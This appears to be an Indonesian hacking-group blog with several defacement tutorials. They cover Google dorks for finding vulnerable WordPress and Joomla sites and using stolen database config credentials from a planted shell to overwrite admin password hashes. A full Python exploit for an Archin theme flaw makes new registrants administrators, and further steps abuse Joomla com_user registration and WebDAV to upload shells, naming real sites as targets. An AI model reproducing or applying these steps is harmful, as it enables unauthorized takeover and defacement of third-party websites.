COM_USER Vulnerability scanner

Hallo sobat :)
kali ini saya akan share
COM_USER Vulnerability scanner hihihihi :)
Langsung aja yuk, josss ...
pertama - tama kita harus mempunya target :)
dengan cara memakai dork kita  , masing - masing .,
nah jika target udh ketemu kita tinggal scan aja deh :)
*karna banyak nya permintaan dari para member
Bahan - Bahan :
Com_user scanner
Target
Modem
Kopi
Nasgor
Xixixixixi

anda bisa dowload com_user scanner disini *bagi yang ingin scriptnya
oiya anda harus gabung juga  di tim kami :)
https://www.facebook.com/groups/G.Corps/
untuk bisa mendapatkan nya hihihi
atau anda bisa memakai scanner saya
http://sbapple.com/scanner/

jika berhasil *bisa di scan
kira - kira akan begini tampilanya
http://prntscr.com/22pfiv

Oiya,cara pemakainya cukup mudah..,
tinggal cari website vuln , terus kita klik tombol scan site
http://prntscr.com/22pfu0

SELAMAT MENIKMATI :)

Keywords : Com_user , scanner , scan , site , vuln , vulnerability , registrasion , exploit , version , php , html ,
                   dowload , cara ,

Continue reading...

Cara Deface Dengan Config

Assalamualaikum Wr.Wb

sebelumnya kita memanjatkan puji syukur
ke hadirat allah swt.,
karena kita semua diberi kesehatan dan rejeki
amiin;.,
#Note: Di dunia hacking tidak ada yang instant., kita harus terus berusaha selagi ada usaha
dan di dunia hacking tidak ada orang malas seperti mereka yang tidak mau usaha

mereka yang berhasil adalah orang yang berusaha untuk tujuannya

Karena malam mingguan., jadi admin share in H

BAHAN - BAHAN :

Web vuln CMS WORDPRESS ATAU CMS JOOMLA
Config Website
Shell 1NJ3CTION v3.2 <<View Source>> <<Dowload>> pass default : yazid
Mysql Sebenarnya Mysql udh disediakin di Shell 1NJ3CTION v3.2 ., tapi kalo tab Mysql ga bisa
anda bisa dowload cadangan mysql dari hasil saya browsing <<Dowload>> *Tidak wajib
--------------------------------------------------------------------------------------------------
Trik (Cara Mendeface Dengan teknik Config)

Pertama - tama kita harus punya config dari website tadi..
anda bisa cari di google., dengan keyword "cara mencari config di sebuah website " ^^
Saya anggap disini target sudah ada dan sudah terpasang Shell dan config nya
Kira - kira tampilannya akan seperti *Contoh config
Lihat gambar dibawah

























Dan saya sudah  menemukan suatu config / Data dari website tadi
NB : Copy DB_USER untuk mengisi Kolom username di mysql
         Copy DB_Password untuk mengisi Kolom password di mysql
























Kira - Kira tampilan nya akan seperti ini
lalu klik tombol "Enter"
lihat gambar dibawah






















Jika kita berhasil login...
kira - kira tampilannya akan seperti ini  Lihat gambar
lalu Klik tombol "Tables" pada nik DB_USER website tadi
Contoh DB_USER : Bjjlond1_wp
Intinya kita pilih databases yang paling bawah

Kalau udh kira - kira tampilan table nya website tadi akan seperti ini : Lihat gambar
dan kita klik tombol "Data"
pada Wp_user ...
NB: Jika Joomla : Jos_users
       Jika di web yang ada path nya  [path web]wp_user / [path web] user

Jika tampilan seperti ini (lihat gambar)

Klik tombol "edit" pada user no 1

Kita edit user_pass dengan pass MD5 kita (pass harus MD5) anda bisa hash MD5 di sini

tempat hash di "Your MD5 Hash"
Klik "generate MD5 hash".ico

Contoh : yazid123 > kalo udh di  MD5 menjadi 837ae4833bde0dc2f5825bbdf0bd646b
Untuk lebih jelas lihat gambar dibawah :

Kita copy kode md5 tadi dan kita paste kan kode MD5 tadi di user_pass

Lalu klik "Edit Data'.ico

Terus kita check User tadi "seperti yang saya tandai kotak besar"
kita cocokkan kode user_pass dengan kode MD5 kita ., jika berhasil..!!
berarti bisa..! Kita bisa login ke website tadi :)
anda bisa baca tulisan saya dibawah
Cara mencari URL adress website CMS wordpress

Tambahan..!!
cara mencari URL ADRESS WEBSITE CMS WORDPRESS

kita harus udh login mysql di web tadi..
dan kita ke Table list config  web tadi :)
Kita klik Data Wp_Option
























Copy Value di site url..
Contoh : tables
id = 1 name=siteurl value=http/site.com
yang kita copy valuenya























Kalau udh kita coba login di web tadi...
tambahkan /wp-login.php pada url website tadi
contoh www.site.com/wp-login.php
nanti akan muncul sebuah
kolom user login...

Kalo udh kita akan dialihkan ke /wp-admin/
berarti web tadi vuln ^^
Tinggal tebas aja tuh :)
selamat bermain ^^












SELAMAT MENIKMATI :)

Keyword : Contoh., Cara,Membuat , menghack , mendeface , deface, hack , hacker , defacer , bobol , website , web , url , address bar , dengan , index., home , archin , exploit , Wordpress
html., footer, php , cms , dashboard , admin , menjadi , 

Writted content By : FUK4 a.K.a gh0st4r00t

Continue reading...

Deface dengan teknik Archin Wordpress Theme 3.2 Unauthenticated Configuration Access Vulnerability | Garuda - Corps

Assalamulaikum Wr Wb

sebelumnya kita memanjatkan puji syukur
ke hadirat allah swt.,
karena kita semua diberi kesehatan dan rejeki
amiin;.,
#Note: Di dunia hacking tidak ada yang instant., kita harus terus berusaha selagi ada usaha
dan di dunia hacking tidak ada orang malas seperti mereka yang tidak mau usaha

mereka yang berhasil adalah orang yang berusaha untuk tujuannya

Hallo sobat ^_^ kali ini saya akan mengshare teknik lain lagi hihihihih....

Kira - kira teknik apa yah ? yang akan saya share hari ini ?
simak berikut hehehehe :v

BAHAN - BAHAN :

Pyhton Last version <Dowload>

Dork :
/wp-content/themes/*/hades_framework/
/wp-content/themes/felici/hades_framework/
/wp-content/themes/averin/hades_framework/
/wp-content/themes/shotzz/hades_framework/
/wp-content/themes/KLR/hades_framework/
/wp-content/themes/yvora/hades_framework/
inurl:/wp-content/themes/felici/hades_framework/ site:.com

inurl:/wp-content/themes/shotzz/hades_framework/ site:.info

inurl:/wp-content/themes/KLR/hades_framework/ site:.uk

inurl:/wp-content/themes/yvora/hades_framework/ site:.net
intext:yvora 2011 site:.com
intext:yvora 2011 site:.uk
intext:Themes shotzz site:.nl
intitle:[flash] swf

Exploit:
/wp-content/themes/temanya/hades_framework/option_panel/ajax.php

NB: Mau lihat temanya ? ., liat trik cara melihat tema suatu website

Exploit Pyhton :
copy Exploit Pyhton berikut ke notepad :

# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "target website"
#path to ajax.php
url = "/wp-content/themes/yvora/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
     
ChangeOption(site, url, "admin_email", "emailmu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
NB: Ganti tulisan biru  dengan Target website  contoh : www.site.com <tidak usah http//>
       Ganti tulisan Hitam dengan Exploit website (url belakang target)
       misal :site.com/wp-content/themes/yvora/hades_framework/option_panel/ajax.php
       Ganti tulisan Biru muda  dengan emailmu Contoh : yazid4u@gmail.com

Save file nya dengan extensi .py
contoh lol.py
Masih kurang paham ? lihat cara mengsave file .py dari notepad di google ^_^

Cara melihat Tema suatu website (cms wordpress) :

Pertama - tama kita harus punya target website..
thema yang vuln archin adalah
yvora, shotzz , KLR , Averin , dll
saya mengambil yang thema shotzz., karna kebanyakan thema vuln adalah tema shotzz
misalkan target : http://kern1.linuxpl.info/kern/
tekan ctrl + u pada url website tadi

kalo udh cari url ini : www.site.tadi/wp-content/themes/themanya/style.css
contoh ., gambar dibawah ini
NB: seperti gambar yang saya tandai

Lalu klik url tadi., contoh www.site.tadi/wp-content/themes/themanya/style.css
dah ketemu kan ^_^ thema webnya xixixixix :v
lebih jelasnya anda bisa search di google ^_^

TRIK (CARA MENGEKSEKUSI) :

pertama - tam kita cari target di  www.google.com atau www.google.co.id

Kita search dengan dork kepercayaan kita masing masing hihihihi :v

Kalo ane sih pake dork kepercayaan ane : "inurl:wp content themes shotzz" site:uk"

Lihat seperti gambar dibawah :

ya,setelah kita memilih target., kita ganti url, target dengan exploit kita masing - masing.,
nb : exploit <menambahkan / menghapus alamat belakang suatu website >

kalo exploit web ini : /wp-content/themes/shotzz/hades_framework/option_panel/ajax.php

NB : Setiap web beda thema dan exploit...!! anda bisa lihat
 Cara melihat Tema suatu website (cms wordpress)  di google
Kalo web tadi blank., setelah anda exploit tin ., berarti web tadi vuln..!!!!
CONTOH LIHAT GAMBAR DIBAWAH :

Klik ikon start start >  Run > input "cmd"  nanti akan muncul sebuah command prompt.
CONTOH :

Ketik "cd C:\" di cmd tadi
kira - kira gambar akan seperti ini
NB : Exploit phyton harus berada di disk C:\

kita edit exploit phyton tadi klik kanan exploit phyton > pilih open with > klik notepad
NB : Exploit phyton harus berada di disk C:\

Kita edit file tadi., kira - kira seperti gambar dibawah ini

Lalu klik save

Lalu kita jalankan file exploit phyton tadi lewat cmd.,
input "namajudulfiletadi.py" contoh judul : LOL.py
Kalo ada tulisan :
200 OK
success
200 OK
success
200 OK
success
Now register a new user, they are an administrator by default!
berarti bisa...!!
lihat gambar dibawah :

Kalo udh kita form login site  tadi.,
tambahkan exloit berikut : /wp-login.php atau /wp-login/
contoh : www.site.tadi/wp-login.php/
jika tidak bisa. tambahkan path web tadi contoh : site.tadi/path/wp-login.php
contoh url form login : site.tadi/tadi/wp-login.php
lalu klik ikon register.,
jika tidak ada ikon register., karena admin mendisablenya.,
maka kalian harus menemukan form register.nya
default exploit form register : /wp-login.php?action=register
                                            /wp-login?action=register
                                            /wp-register/
jika ada path., silahkan tambahkan path web tadi ^_^

Kalo udh isi kolom "username" dan kolom "email"
dengan user dan email anda
seperti gambar dibawah ini ^_^

Jika selesai akan ada tautan berikut (lihat gambar dibawah) di atas (header)
kolom register tadi...

Jika sudah check email kalian ^_^ akan ada email dari website tadi ^_^
NB: Email bisa di folder spam., Pembaruan , Utama

sekrang., buka salah satu email dari web tadi.,
dan kalian akan dikasih user., <yang kalian daftarkan >
dan default pass., admin tadi..
contoh gambar dibawah :

dan silahkan login di website tadi., keterangan form login ., ada di email balasan web tadi ^_^

silahkan login ^^., dan jika berhasil.,
kira- kira tampilan nya seperti beriku
lihat gambar

SELAMAT MENIKMATI :)

Keyword : Contoh., Cara,Membuat , menghack , mendeface , deface, hack , hacker , defacer , bobol , website , web , url , address bar , dengan , index., home , archin , exploit , Wordpress
html., footer, php , cms , dashboard , admin , menjadi , 

Writted content By : FUK4 a.K.a gh0st4r00t

Continue reading...

Deface dengan teknik COM_USER | Garuda - Corps

Assalamulaikum Wr Wb

sebelumnya kita memanjatkan puji syukur
ke hadirat allah swt.,
karena kita semua diberi kesehatan dan rejeki
amiin;.,
#Note: Di dunia hacking tidak ada yang instant., kita harus terus berusaha selagi ada usaha
dan di dunia hacking tidak ada orang malas seperti mereka yang tidak mau usaha

mereka yang berhasil adalah orang yang berusaha untuk tujuannya

oke pertama - tama kita kumpulkan bahanya dulu ..,

Exploit Joomla | Com_user  view source | Dowload
Dork: 

inurl:/index.php/login intext:Joomla! site:.com

inurl:/index.php/login site .com

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors. site:.uk
intitle:Don't Have Account ? site:.com
intitle:Login- site.com

inurl:itemid= site:uk

inurl:itemid= site:com

inurl:itemid= site:id

inurl:itemid= site:nl

inurl:itemid= site:uk

inurl:itemid= site:jp

inurl:itemid= site:it
intext:Joomla 1.7
inurl:index.php/19-sample-data-articles/ joomla site:it
Dork lengkap ada disini  View
anda harus gabung dulu di Group kami ., jika anda ingin semua dork itu :) 
https://www.facebook.com/groups/G.Corps/
Monggo dipilih 1 aja :)

Dork dikembangin sendiri okeh :)
Exploit: index.php?option=com_users&view=registration
Shell (jika perlu)
Ciri - ciri web vuln COM_USER :

ciri - ciri berikut berdasarkan garis bawah., yang hampir dekat dengan garis footer.,
berarti webtadi vuln..,

Update: Garis bawah lebih jauh dari garis footer normalnya., itu dianggap vuln juga ^^

contoh gambar :

Cara Memakai :

1.Pertama - tama kita buka link  berikut
   dan kita copy file tadi ke notepad., lalu kita simpan dalam format .html
   cara simpan ke file html., klik save > pilih allfiles > beri nama "ExploitJoomla.html"
   seperti gambar dibawah ini :
   lebih gampangnya anda dowload  exploit joomla nya disini

buka https://www.google.com/ atau https://www.google.co.id
   kita search dengan dork tadi., dan saya mengambil salah satunya :)
   misalnya : inurl:/index.php/login intext:Joomla! site:.com
    seperti gambar dibawah ini

2.Kalau sudah ketemu (targetnya) biar lebih singkatnya

   misal target ane www.aspie.org.uk

3.kita exploit tin target tadi dengan menambahkan

   index.php?option=com_users&view=registration
   atau /index.php/login?view=registration

    hasil seperti ini:

   www.aspie.org.uk/index.php/login?view=registration
    atau anda bisa lihat gambar dibawah

4. Kalau udh tekan ctrl + u  atau klik kanan > view - source (yang ada di google chrome)

5.Habis itu tekan ctrl + f
   atau anda bisa klik kanan > pilih find
   masukkan kode ini "hidden" ., pilih yang bawah sendiri atau cari seperti kode berikut.,

   lihat gambar dibawah

6. Copy kode tadi ke exploit joomla.html yang udh kalian dowload tadi.,

    cara membuka file exploit joomla.html ke notepad  :
     Klik kanan Exploit Joomla.html > Pilih open with > pilih Notepad
     copy kan urlsite seperti yang saya tandai di gambar
      #note:silahkan ganti username., email.,
      Setelah itu klik FIle > save
       atau tekan tombol ctrl + s

7. buka file Exploit Joomla.html (double click file Exploit Joomla.html
     lalu klik "register"

8. lalu di site register tadi, akan muncul peringatan berupa " You passwords entered do not macth.
    Please enter you desired password in the password field and confirm you entry by entering
    it in the confirm" yang artinya anda disuruh memasukkan password yang sama., untuk
   melanjutkan ke step selanjutnya., dan masukkan password mu di kolom password dan
   confirm password., dan klik tombol register.,
    seperti gambar dibawah ini

9.  nanti akan ada peringatan berupa., registrasi berhasil., "sebelum login anda harus mengaktif
      kan user lewat email "
      setelah itu., check email anda., akan ada email dari web tadi.,
      dan buka email tadi .,
     #NB : liat email bisa di kotak pembaruan., kotak utama ., dan kotak spam
     letak kotak spam ada di ., Tab selengkapnya > spam > daftar email spam

10. kita buka email masuk dari web tadi., kita buka link konfirmasinya

      seperti yang saya tandai di gambar berikut

11.Kalo udh selesai akan ada peringatan sebagai berikut

    "Your account has been succesfully activated.You can now log in using the username
       and password you choose during registrasion" berarti registry anda berhasil.!
      dan anda disuruh untuk mengambil confirmasi email nya
      contoh gambar

12. Setelah itu., ke admin loginnya

      contoh admin login joomla (defaultnya) : /administrator  .,  /admin

      sebagai contoh www.aspie.org.uk/administrator

      dan akan kebuka form login admin joomla.,

      mari kita login..,
      user : yazid
      pass : bustomi
     Klik tombol "log in"

 13. Taraaaaaaaaaaaaaaaaaaaaaaaaaaaa., kita masuk admin loginnya ^_^
       tinggal tebas index aja tuh :)
       trus gimana tebas indexnya ?
       use your brain okeh :)
      NB : Kalo ga berhasil ke login admin berarti web tadi udh ga vuln (udh dipacth )

SELAMAT MENIKMATI :)
Keyword : Contoh., Cara,Membuat , menghack , mendeface , deface, hack , hacker , defacer , bobol , website , web , url , address bar , dengan , index., home , com_user , exploit , joomla
html., footer, php , 



Writted Content By : FUK4 a.K.a gh0st4 r00t

Continue reading...

Cara Deface website dengan Webdav

ane akan share sesuatu yang spesial buat anda semua :)
contohnya.., para member & blogger yang nungguin ayam betelur
untuk update artikel :v
oke deh sebelum memulai pertandingan ( wkakakaka ) kita berdoa dulu
sebelumnya., mari kita berdoa dulu
kita panjatkan puji syukur kepada Tuhan YME....
yang telah mengasihi admin disini sebuah Kesehatan..
yang telah memberi admin sebuah kesabaran.....
yang telah memberi admin sebuah kehidupan.....
Semoga mimin sehat selalu amiinn.....
Oke ketopik pembahasan :

+ Bahan - bahan yang diperlukan | Ala Mama Sasha | +
~ Webdav [New]
~ Document Web vuln Web Vuln version dowload
~ Punya script / script bisa dowload disini
~ Komputer
~ Modem
~ Mos
~ Kebod
+ | Cara Memakainya | +

Pertama - tama kita dowload dulu file Webdav [New]
lalu kita extrack file Webdav [New] .rar
masukkan passwordnya : www.yazzid.blog 
ikuti langkah : klik kanan Webdav_[new].rar => Pilih Extrack here => masukkan password

Kalo udh ..,

Jalankan Dav 7.exe
kalo tidak tahu harap ikuti langkah - langkah ini :
=> Klik folder hasil extrack tadi "Webdav.fol" => pilih Dav 7.exe

Double clik Dav 7.exe

maka akan keluar gambar berikut

kalo udh click  icon tambah data/Add list
dan anda akan disuruh untuk memilih file .txt
pilih file web.txt dan klik open
trus ganti name of ur file (/indonesian.txt) menjadi /Namakamu.html (nb: .html jangan diganti)
seperti gambar di bawah

Kalo mau menyusupkan sebuah script / shell di web tadi.., ganti aja

Your message to dear adminya : menjadi script kamu
copy paste aja script kamu kedalam kotak ini.., kalo ga punya script
anda dowload aja disini

kira - kira jadinya akan seperti ini :)

kalo udh lengkap kayak gambar dibawah ini ...
berarti anda tinggal klik aja ikon button "Hajar / scan"

Kalo sudah., anda harus mengeceknya di
Folder Webdav => indonesian .txt
Kalo proses secannya udh selesai ;)
barulah anda ke folder webdav
=> webdav.fol => indonesian.txt
lihat ., ada alamat url nya
contoh
http://doc.wealth-mentors.com/BOT_FUK4.html inilah web yang saya scan tadi :)

cara memanggilnya pun cukup mudah
dengan menambahkan bacaan/texs "name of ur file" di bagian belakang web tadi
contoh nih ya
web yang saya pepes..,
waktu pertama ( belum menyecan \ menghajar )
anda melihat bacaan / text (bawahnya ada box)
maka tulislah nama file mu di box tadi
contoh BOT_FUK4.html
jadi cara memanggilnya dengan menambahkan url /BOT_FUK4.html
di belakang url web tadi :)
 SELAMAT MENIKMATI :)

Keyword : Contoh., Cara,Membuat , menghack , mendeface , deface, hack , hacker , defacer , bobol , website , web , url , address bar , dengan , webdav , hack dengan webdav , situs ,

Writted Content By : FUK4 a.K.a gh0st4 r00t

Continue reading...